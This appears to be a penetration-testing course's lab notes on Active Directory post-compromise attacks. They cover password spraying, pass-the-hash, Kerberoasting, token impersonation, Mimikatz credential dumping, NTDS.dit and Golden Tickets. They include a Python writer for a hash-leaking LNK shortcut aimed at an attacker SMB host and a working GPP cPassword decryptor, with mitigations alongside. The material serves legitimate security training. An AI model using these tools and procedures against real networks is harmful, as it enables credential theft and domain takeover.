AD - Post-Compromise Attacks

Pass the Hash

crackmapexec

📌 Some of the commands below may no longer work, since CrackMapExec is no longer maintained. Jump to NetExec (the maintained fork, same syntax) for working equivalents.

➡️ crackmapexec - a post-exploitation tool that helps automate assessing the security of large Active Directory networks

Pass the Password

crackmapexec smb 192.168.31.0/24 -u fcastle -d MARVEL.local -p Password1

Sprays one known domain password across the whole subnet; every host that comes back marked Pwn3d! accepts that account as a local administrator.

Pass the Hash

  • Use the local administrator's NT hash from the SAM dump instead of a password (the -H option together with --local-auth, since the account lives in the host's SAM, not in the domain). The LM half of the dump is not needed.

netexec

➡️ netexec

secretsdump.py

➡️ secretsdump.py from impacket - dumps the SAM, LSA secrets and cached domain credentials of a host remotely over SMB, and the whole NTDS.dit when pointed at a domain controller

Example of a lateral-movement hash attack chain:

  • LLMNR poisoning -> fcastle NetNTLMv2 hash captured -> cracked -> password sprayed -> new login found -> secretsdump on that host -> local admin hashes -> re-spray the network with the local accounts (pass the hash)

  • e.g. cracking NTLMv1 (NetNTLMv1 responses are far weaker than NetNTLMv2, so they are always worth a cracking attempt)

For mitigation:

  • Avoid re-using local admin passwords across hosts (LAPS gives every machine a unique, regularly rotated one)

  • Disable the guest account and the built-in local Administrator account

  • Use Privileged Access Management (PAM)


Kerberoasting

➡️ Kerberoasting is a post-exploitation technique in which any authenticated domain user asks the KDC (Key Distribution Center) for TGS (Ticket Granting Service) tickets for accounts that have an SPN (Service Principal Name). Part of each ticket is encrypted with the service account's own key, so the ticket can be taken offline and cracked to recover that account's password.

GetUserSPNs.py

➡️ GetUserSPNs.py from impacket - lists the accounts that have SPNs and, with -request, retrieves their TGS tickets in a hashcat/john-ready format

  • e.g. Cracking the $krb5tgs$23$* hash (RC4-HMAC, etype 23, hashcat mode 13100). Accounts configured for AES come out as $krb5tgs$17$/$krb5tgs$18$ instead and crack far more slowly.

For mitigation:

  • least privilege - do not run service accounts as Domain Admin

  • long, random service-account passwords (group Managed Service Accounts rotate them automatically)


Token impersonation

➡️ Tokens are temporary keys that provide access to a system or network without needing to re-enter credentials, similar to how session cookies work on the web.

  • Delegate - created for interactive logons (console or Remote Desktop); only these can be used to authenticate to other systems over the network

  • Impersonate - created for non-interactive logons (network logon, service); usable on the local system only

📌 Turn on the THEPUNISHER (192.168.31.93) and HYDRA-DC (192.168.31.90) VMs, and log in to THEPUNISHER.

  • With the hawkeye token impersonated, dump the secrets from the domain controller

For mitigation:

  • limit user/group token creation permissions

  • account tiering - privileged accounts never log in to lower-tier hosts, so their tokens are never left there to steal

  • local admin restriction


LNK File attack

An attacker with write access to a shared folder can drop a malicious shortcut whose icon points at an attacker-controlled UNC path. Whenever a user merely browses the folder, Explorer tries to render the icon, authenticates over SMB to the attacker's host and leaks the user's NetNTLMv2 hash to a listener such as Responder. It is the internal-network cousin of a watering hole: nobody has to open anything, the trap sits in a place people visit anyway.

📌 Open PowerShell on the THEPUNISHER (192.168.31.93) VM.

  • The following PowerShell script creates a shortcut (C:\test.lnk) pointing to a remote file (\\192.168.31.131\@test.png on the attacker VM), and sets its icon to that same UNC path, a description and a Ctrl+Alt+T hotkey. The icon path is what does the work: Explorer fetches it as soon as the folder is listed, so the shortcut can be used to trick users into touching a remote resource and leaking credentials via an SMB request.

  • rename test.lnk to @test.lnk so it sorts to the top of the folder listing and is rendered first

  • copy the file into the \\hydra-dc\hackme file share

Run Responder (on the Kali VM):

Now just open the \\hydra-dc\hackme share folder on the THEPUNISHER VM and check the Responder log: the hash is captured automatically, nothing has to be clicked.

Automated attack - if the file share is exposed, use the netexec slinky built-in module to create the shortcut on the targeted VM (in every share with write permissions). Its options set the attacker's SMB server address and the shortcut name, and it has a cleanup option to remove the files again afterwards.
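Added example (not the page's PowerShell script and not netexec's slinky module): a pure-Python writer for a minimal shell link whose IconLocation is a UNC path, plus the parser a defender would use to sweep a share for shortcuts that fetch their icon from a remote host. The writer emits only the ShellLinkHeader and the StringData section as laid out in MS-SHLLINK; it assumes, and you should verify in the lab, that Explorer resolves the icon for a link that has no target IDList. The attacker host 192.168.31.131 is the one used on this page; the description text is constructed.

```python
import struct

# MS-SHLLINK ShellLinkHeader constants
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_IDLIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
HOTKEY_SHIFT, HOTKEY_CTRL, HOTKEY_ALT = 0x01, 0x02, 0x04
# StringData fields appear in this fixed order, each only if its flag is set
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

def _string_data(text):
    # CountCharacters (uint16) followed by the UTF-16LE characters, no terminator
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")

def build_lnk(icon_unc, description, hotkey_char="T", modifiers=HOTKEY_CTRL | HOTKEY_ALT):
    """Minimal .lnk: no target, just a name and an icon that lives on a remote SMB host."""
    flags = HAS_NAME | HAS_ICON_LOCATION | IS_UNICODE
    hotkey = (modifiers << 8) | ord(hotkey_char.upper())   # low byte = virtual key, high = modifiers
    # LinkFlags, FileAttributes, Creation/Access/WriteTime, FileSize, IconIndex,
    # ShowCommand (1 = SW_SHOWNORMAL), HotKey, Reserved1, Reserved2, Reserved3
    header = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID
              + struct.pack("<IIQQQIIIHHII", flags, 0, 0, 0, 0, 0, 0, 1, hotkey, 0, 0, 0))
    return header + _string_data(description) + _string_data(icon_unc) + b"\x00\x00\x00\x00"

def parse_lnk(blob):
    """Return (flags, hotkey, string_data) from any shell link, skipping IDList/LinkInfo if present."""
    if (len(blob) < LNK_HEADER_SIZE or struct.unpack_from("<I", blob)[0] != LNK_HEADER_SIZE
            or blob[4:20] != LNK_CLSID):
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", blob, 20)[0]
    hotkey = struct.unpack_from("<H", blob, 64)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_IDLIST:                      # IDListSize + IDList
        off += 2 + struct.unpack_from("<H", blob, off)[0]
    if flags & HAS_LINK_INFO:                               # LinkInfoSize includes itself
        off += struct.unpack_from("<I", blob, off)[0]
    strings, width = {}, 2 if flags & IS_UNICODE else 1
    for bit, name in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", blob, off)[0]
            raw = blob[off + 2:off + 2 + count * width]
            strings[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            off += 2 + count * width
    return flags, hotkey, strings

def remote_icon_host(blob):
    """Host the icon is fetched from if IconLocation is a UNC path, else None (defender's check)."""
    icon = parse_lnk(blob)[2].get("icon_location", "")
    return icon[2:].split("\\", 1)[0] if icon.startswith("\\\\") else None

def find_poisoned_shortcuts(files):
    """files maps share path -> file bytes; returns [(path, host)] for links with a remote icon."""
    hits = []
    for path, blob in files.items():
        try:
            host = remote_icon_host(blob)
        except ValueError:
            continue
        if host:
            hits.append((path, host))
    return hits

if __name__ == "__main__":
    blob = build_lnk(r"\\192.168.31.131\@test.png", "Quarterly report")
    with open("@test.lnk", "wb") as f:                      # @ sorts first, so it renders first
        f.write(blob)
    print(parse_lnk(blob))
```

The defender-side sweep is the interesting half: walk every writable share, call find_poisoned_shortcuts on the .lnk files and alert on any icon_location that is a UNC path to a host that is not your file server.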


GPP Attacks - cPassword attacks

➡️ Group Policy Preferences (GPP) allowed admins to create policies with embedded credentials (local accounts, scheduled tasks, drive maps, services).

  • the credentials were stored AES-encrypted in the cPassword attribute of XML files (Groups.xml, ScheduledTasks.xml, Drives.xml, Services.xml, ...) under SYSVOL, which every domain user can read

  • the 32-byte AES key was published in Microsoft's own documentation, so anyone can decrypt them

  • patched in MS14-025 (May 2014), but the patch only stops new passwords from being saved; previously stored credentials remain in SYSVOL, so this is still relevant for pentesting
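The cPassword decryption is simple enough to carry out by hand, which is the whole problem. The Python below is an added example (not from the page, and not Get-GPPPassword or gpp-decrypt): it implements AES-256-CBC decryption in pure Python so it runs without third-party packages, and applies it to the cpassword attributes found in a GPP XML file. The Groups.xml fragment is constructed for this page; the cpassword value inside it is the publicly documented one from the Hack The Box "Active" machine, which decrypts to GPPstillStandingStrong2k18 and serves as a known-answer test.

```python
import base64
import re

# The AES-256 key Microsoft published in the MS-GPPREF documentation; every cPassword uses it.
GPP_AES_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

# ---- minimal AES-256-CBC decryption in pure Python (no third-party packages) ----
def _gmul(a, b):  # multiplication in GF(2^8) modulo x^8+x^4+x^3+x+1
    r = 0
    while b:
        if b & 1:
            r ^= a
        a = ((a << 1) ^ 0x11B) & 0xFF if a & 0x80 else a << 1
        b >>= 1
    return r

def _make_sboxes():  # S-box = affine(inverse(x)), derived instead of typing 256 constants
    sbox = [0] * 256
    for x in range(256):
        inv = next(y for y in range(256) if _gmul(x, y) == 1) if x else 0
        s = inv
        for _ in range(4):
            inv = ((inv << 1) | (inv >> 7)) & 0xFF
            s ^= inv
        sbox[x] = s ^ 0x63
    inv_sbox = [0] * 256
    for i, v in enumerate(sbox):
        inv_sbox[v] = i
    return sbox, inv_sbox

SBOX, INV_SBOX = _make_sboxes()

def _expand_key(key):  # AES-256 key schedule: 8 key words -> 60 words -> 15 round keys
    w, rcon = [list(key[i:i + 4]) for i in range(0, 32, 4)], 1
    for i in range(8, 60):
        t = list(w[i - 1])
        if i % 8 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0], rcon = t[0] ^ rcon, _gmul(rcon, 2)
        elif i % 8 == 4:
            t = [SBOX[b] for b in t]
        w.append([x ^ y for x, y in zip(w[i - 8], t)])
    return [sum(w[r * 4:r * 4 + 4], []) for r in range(15)]

def _inv_shift_sub(s):  # InvShiftRows then InvSubBytes; state is column-major, index = 4*col + row
    return [INV_SBOX[s[4 * ((c - r) % 4) + r]] for c in range(4) for r in range(4)]

def _inv_mix_columns(s):
    out = []
    for c in range(4):
        a0, a1, a2, a3 = s[4 * c:4 * c + 4]
        out += [_gmul(a0, 14) ^ _gmul(a1, 11) ^ _gmul(a2, 13) ^ _gmul(a3, 9),
                _gmul(a0, 9) ^ _gmul(a1, 14) ^ _gmul(a2, 11) ^ _gmul(a3, 13),
                _gmul(a0, 13) ^ _gmul(a1, 9) ^ _gmul(a2, 14) ^ _gmul(a3, 11),
                _gmul(a0, 11) ^ _gmul(a1, 13) ^ _gmul(a2, 9) ^ _gmul(a3, 14)]
    return out

def _decrypt_block(rk, block):  # FIPS-197 InvCipher
    s = [b ^ k for b, k in zip(block, rk[14])]
    for rnd in range(13, 0, -1):
        s = _inv_mix_columns([b ^ k for b, k in zip(_inv_shift_sub(s), rk[rnd])])
    return bytes(b ^ k for b, k in zip(_inv_shift_sub(s), rk[0]))

def aes256_cbc_decrypt(key, iv, data):
    rk, out, prev = _expand_key(key), bytearray(), iv
    for i in range(0, len(data), 16):
        block = data[i:i + 16]
        out += bytes(p ^ c for p, c in zip(_decrypt_block(rk, block), prev))
        prev = block
    return bytes(out)

# ---- GPP specifics ----
def decrypt_cpassword(cpassword):
    """GPP drops the base64 '=' padding; IV is 16 zero bytes; plaintext is PKCS#7-padded UTF-16LE."""
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    plain = aes256_cbc_decrypt(GPP_AES_KEY, b"\x00" * 16, raw)
    return plain[:-plain[-1]].decode("utf-16-le")

def find_gpp_credentials(xml_text):
    """(account, password) for every cpassword in a Groups/Drives/ScheduledTasks/Services XML."""
    creds = []
    for m in re.finditer(r'<Properties\b[^>]*?\bcpassword="([^"]*)"[^>]*>', xml_text):
        who = re.search(r'\b(?:userName|runAs|accountName)="([^"]*)"', m.group(0))
        creds.append((who.group(1) if who else "", decrypt_cpassword(m.group(1))))
    return creds

# Constructed Groups.xml fragment; the cpassword value is the publicly documented one from the
# Hack The Box "Active" machine and decrypts to GPPstillStandingStrong2k18.
SAMPLE_GROUPS_XML = r'''<?xml version="1.0" encoding="utf-8"?>
<Groups><User name="svc_backup" changed="2018-07-18 20:46:06">
<Properties action="U" newName="" fullName="" description=""
 cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
 changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="MARVEL\svc_backup"/>
</User></Groups>'''

if __name__ == "__main__":
    print(find_gpp_credentials(SAMPLE_GROUPS_XML))
```

Point find_gpp_credentials at every *.xml under \\<dc>\SYSVOL\<domain>\Policies and you have the same result the Get-GPPPassword PowerShell module or the gpp-decrypt tool on Kali would give you.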

For mitigation:

  • Install KB2962486 on every computer used to manage GPOs; it prevents new credentials from being placed in Group Policy Preferences.

  • Delete existing GPP XML files in SYSVOL that contain a cPassword, and change the passwords of the accounts they exposed (removing the file does not change the password).

Good article - Finding Passwords in SYSVOL & Exploiting Group Policy Preferences (Active Directory Security)


Credential dumping with Mimikatz

➡️ Mimikatz - a tool that extracts plaintext passwords, hashes, PIN codes and Kerberos tickets from LSASS memory. It can also perform pass-the-hash, pass-the-ticket or build Golden Tickets.

📌 Turn on SPIDERMAN (192.168.31.92) and log in as peterparker with the hackme file share attached.

  • Open http://192.168.31.131/mimikatz_trunk/x64/ in the SPIDERMAN VM and download all four files in that directory

  • Run cmd as admin (mimikatz needs SeDebugPrivilege to read LSASS)

  • Check for clear-text passwords, e.g. the credentials used to mount the shared folder. On Windows 8.1/Server 2012 R2 and later (or older systems with KB2871997) WDigest no longer caches plaintext passwords unless the UseLogonCredential registry value has been set to 1, so expect hashes rather than passwords on patched hosts.

  • Check for NTLM hashes (directly usable for pass the hash).

  • Mimikatz is flagged by every antivirus, so it needs obfuscation and/or an AV bypass to run on protected systems; LSASS protection (RunAsPPL, Credential Guard) stops it reading credentials at all.


📌 Attack strategy for internal pentest

  • Account compromised

  • Quick wins:

    • Pass the hash / password with the compromised account

    • Secrets dump on every host it is admin on

    • Re-spray the network with the hashes/passwords the dump gave you

  • Dig deeper:

    • Enumerate (Bloodhound, users, domain admins, sensitive VMs, etc)

    • Account access

    • Old vulnerabilities

  • "Think outside the box"

    • How can I move laterally until I can move vertically?


📌 Post-Domain Compromise Actions

Once the domain is owned:

  • Maximize value for the client:

    • Repeat the process for verification

    • Dump NTDS.dit and crack passwords

    • Enumerate shares for sensitive data

  • Maintain persistence:

    • Plan for lost Domain Admin (DA) access

    • Create a temporary DA account (remember to delete it)

    • Use a Golden Ticket if needed


Dumping NTDS.dit

➑️ NTDS.dit is the Active Directory database file used by Microsoft Windows Domain Controllers (DCs). It stores critical domain information, including:

  • User and computer accounts

  • Password hashes

  • Group memberships and permissions

It is important because:

  • it contains the NTLM and Kerberos (AES) keys of every account, making it a prime target for attackers

  • once dumped (secretsdump.py against the DC, or Mimikatz/a copy of the file together with the SYSTEM hive), the NT hashes can be used directly via pass the hash or cracked to reveal passwords, Domain Admins' included

  • it enables privilege escalation and persistent access (e.g. Golden Ticket attacks via the krbtgt key)

  • Keep only the NT hashes from the output (the fourth colon-separated field of each line) and try to crack them, e.g. with hashcat mode 1000


Golden Ticket

➡️ A Golden Ticket attack is a Kerberos authentication exploit that allows an attacker to generate forged TGTs (Ticket Granting Tickets), granting them persistent and unrestricted access to an Active Directory (AD) environment.

  1. Obtain the krbtgt key – The attacker dumps the krbtgt account's NTLM hash (or AES key) from the NTDS.dit database on a domain controller.

  2. Forge a TGT – Using Mimikatz, the attacker crafts a fake Kerberos TGT, choosing any username, group memberships and privileges.

  3. Gain Domain Access – The forged ticket is injected into the session (pass the ticket) and used to request service tickets (TGS) for any resource; mimikatz gives it a 10-year lifetime by default, so it outlives any normal session.

  4. Persistence – The ticket stays valid even if user passwords change; only resetting the krbtgt password twice invalidates it, because the KDC still accepts tickets issued under the previous krbtgt key.

❗ Whoever holds the krbtgt account's key owns the domain: krbtgt is the KDC's own service account and its key signs every TGT.

Pass the Ticket - mimikatz

📌 Turn on the THEPUNISHER (192.168.31.93) and HYDRA-DC (192.168.31.90) VMs.

  • Download Mimikatz onto the domain controller VM

  • Run cmd as admin on HYDRA-DC and dump the krbtgt secret with Mimikatz (the lsadump::lsa module with /inject, targeting the krbtgt account)

  • Note the domain SID and the NTLM hash of the krbtgt account from the output

  • Back in Mimikatz, generate the golden ticket with the kerberos::golden module, giving it the domain, the domain SID, the krbtgt hash and an arbitrary username, and inject it into the current session (/ptt)

The attacker can use the forged ticket to access Kerberos-integrated resources. Since the TGT is encrypted and its PAC signed with the legitimate krbtgt key, every domain controller recognizes it as valid authentication and issues Ticket Granting Service (TGS) tickets based on the forged TGT; the forged username does not even have to exist.

  • To open a session with the generated golden ticket, launch a new command prompt from Mimikatz (misc::cmd) so it inherits the injected ticket

  • Download and use psexec.exe from that prompt to run commands against other computers or get a remote shell on them

Impacket from the Kali VM can do the same: secretsdump.py to obtain the krbtgt hash, lookupsid.py for the domain SID, ticketer.py to forge the ticket into a .ccache file, then psexec.py with -k -no-pass and KRB5CCNAME pointing at that file.

